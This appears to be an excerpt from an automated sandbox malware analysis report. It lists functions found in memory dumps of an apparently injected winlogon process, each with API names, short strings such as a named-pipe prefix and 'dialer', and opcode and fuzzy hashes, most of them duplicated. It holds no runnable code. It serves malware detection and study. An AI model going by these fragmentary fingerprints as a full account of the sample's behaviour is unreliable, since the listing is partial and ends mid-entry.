                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 5a3c0a9bbafb0f78905138bbf46c57f4a34e7ddab14eac61c3c20f9c737e8ad5
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 9B418077214F94D6E764CFA5E44839E77A1F388B9AF148129DB8947B58DF38C849CB00
                                                        Function 00000225DC64104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: d1ef6154134f3d25a2e3b62082cc3c12da5f52964662e2438e80bc3b6bcb4469
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: B6418077218F94D6E760CFA5E44879E77A1F388B99F148129DB8A07B58DF38C449CB00
                                                        Function 00000225DC6AD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 2022ee20624ae9fac7997fd3bf5dc1645fffc08433487f268156f8275001b495
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 6911C468700F6461FA68EBFE5A5D36961415F543F2F34D324A83AC77EADE78C842C201
                                                        Function 00000225DC64D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: be52c68ba33939f5a848b29d9d21d48e408fdab80177f021fac5a07cf6ddf0ee
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: C111B628B0CE64A1FE6897BED55D32971415B557F2F14C3A4A87B477DADE78C442C200
                                                        Function 00000225DC6A7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: f6d16694de95954a0b883b7a0c824403c85fe028b68c945db90d9150eb585885
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: CF81D22D700E21B6FB54EBEDA84D39966D1AB8578BF34D425DA04C77A6DB38C845CF00
                                                        Function 00000225DC647510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: a54115b046e8042141df28d7bb05dcfe8318faa30d7cb3b304a9c15ab40c91e6
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 0281362C61CE31AAFB54ABEDA44C39937D1E785782F14C4A4DA0B877A6DB38C845CF00
                                                        Function 00000225DC6A9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 0f4212df039294fefdde6ff96b437b18f0d6b6311749627e01e145e3100ab471
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: F431F429312E20F1EE25DBCAA80875523D4BF48BA2F3985259D1E8B79ADF38C047C300
                                                        Function 00000225DC649DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 1846bb63d11909a53191b25e77548844483a8de6adc9bd3f24389271b0a95010
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 2131E62935EE60F1EE21DBCAA408B653398BB48BA6F5985259D1F0B798DF39C447C300
                                                        Function 00000225DC6B3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 6e1e93a200b7bd570fa0b190f4c403581b2cb531a58d9972e87f4823fb88df5f
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 1E11BC35310FA096E7508B9AE848319B7A5F388FE7F088225EB1E877A4CF38C805C740
                                                        Function 00000225DC653DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 158becd88709c9cbcacd230cd8387edf0a13bed790f97ee48f9835d8b457c441
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 5A119135720F6096E7608BDAE84831977A0F788FE6F248225EB5E877A4CF78C914C740
                                                        Function 00000225DC6A3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 5626651945d5fb8906f413eb53f91b70d6605e573597d601334c82dde5c84599
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 40118B2A304F6092EF189BAAE40C269B3A5FB88F86F148038DF8943794EF3DC505C704
                                                        Function 00000225DC6A5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 0ad3d618e1835294593f6452ab590f590bc81cd41d15a12307719c1f0daf2064
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: C9D1AC7A208F9895DB70DB4AE49435A7BA0F7C8B89F104116EACD87BA9DF3CC551CB40
                                                        Function 00000225DC6A2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 6d0a1707391fcb5c153528b149007a8a8c9fe1f40df049437015618af4cf0edf
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 5E31B23A781F61A2EA15CF9EE54876967A1FB48B86F18C0309F4C87B55EF34D4A1C300
                                                        Function 00000225DC642F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 2e98920b3895b546e8cfee93848436d20f1d91fbd890dc42e4983bef65e91d92
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 9131CE2A309F65A2EB52CFDEE54872A77A0FB44B86F18C1209F4A47B55EF34C4A1C300
                                                        Function 00000225DC6ACFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 6f9918c3cbd4a8341a5960baa032c6c80083ab5fabd7ed8650c6535314c37da2
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: B9119D68300E6061FA68EBFE564D32922426F987B6F30C324A836C77EADE78C441C201
                                                        Function 00000225DC64CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 4157702fcb9233f49a77c46e803b27685ba528657f510afb3a862d3f666b09f6
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: B3119D2874CE6071FE64ABFE954D32932426B95BB6F10C3A4A837477EADE78C441C200
                                                        Function 00000225DC6A199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: cb2a63c83e44a23da2db583fd32e9b754654e1e9db48b59022d394c89ab082b1
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 99016929300E5092EB18DB9AA89C35963A6FB88BC6F988035DF4D83754DF3CC989C740
                                                        Function 00000225DC64199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: c75f4c628c11a50a5007a532dfe706c93d8ee4e04b1e1be502c9ae2a36d6589c
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 0E016929314E5092EB60DB9AA84C35963A1F788BC6F988075DF8A43754DF3CC989C740
                                                        Function 00000225DC6A36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 3adde3a003b7029c84831e13eabd217eaefc6f8cdf697e4629c9387f833a695b
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: FB012969211F60A2EB289BAAE91C71977A1BB59B87F188424CE4947764EF3DC148C704
                                                        Function 00000225DC6436C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 5377c2d080006a4fe2cd119959f91c4f1597db279fc077c9b970d2bb0f292206
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: E101296D325F6492FB649BAAE80C71A73A0BB49B87F148464CE4A07765EF3DC158C704
                                                        Function 00000225DC6A8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: 599e737887705c3809ce4680662d838ae3905f4783b37dc68dc1ccc8eae22418
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: 78519F3A701A20AAEB14DFA9E84CB5937A6F344BCAF30C524DA568778DDB75DD42C700
                                                        Function 00000225DC648FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: b166926d79cf74f009588074e3820990c0fc1e07a97fa4e01069ba2e3ee14553
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: 6651BF3A75DA20EAEB14DF99E84CB5937AAF344B8AF10C5A4DA174778CDB35C842C700
                                                        Function 00000225DC6A1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 2a81db31a951e5e259a4acc7b5a595b85a3b479c602b75ed73f30d03813019d1
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: BBF06866304E51A2EB60CFE9F9C87597762F748B8AF94C020DB4946654DF3CC64DCB00
                                                        Function 00000225DC641A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: e535c0649dfb5c656df934673802aa2881829a80634b4f76755b7f08d64bed47
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 69F04466718E51A2E7608BE9F9887596761F748BC9F94C020DB4A46654DF3CC68DCB00
                                                        Function 00000225DC6A3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: fb1c96070f1bbd8c52466b515c03c742fb3955bbc3562a61c2f5362b02f3ede6
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 5BF05828204FA4A2EA588FDBB9081197262AB48FC2F08E030EF4A47B18DF38C445C700
                                                        Function 00000225DC6ABC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 859cf1714d0438efb9fd229f799e05916821dabd80631214c70755d8405ab38f
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 21F09679311F15A1FB148BEDE84C3596361EB84767F548219CB6A452F4DF3CC444C740
                                                        Function 00000225DC643044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
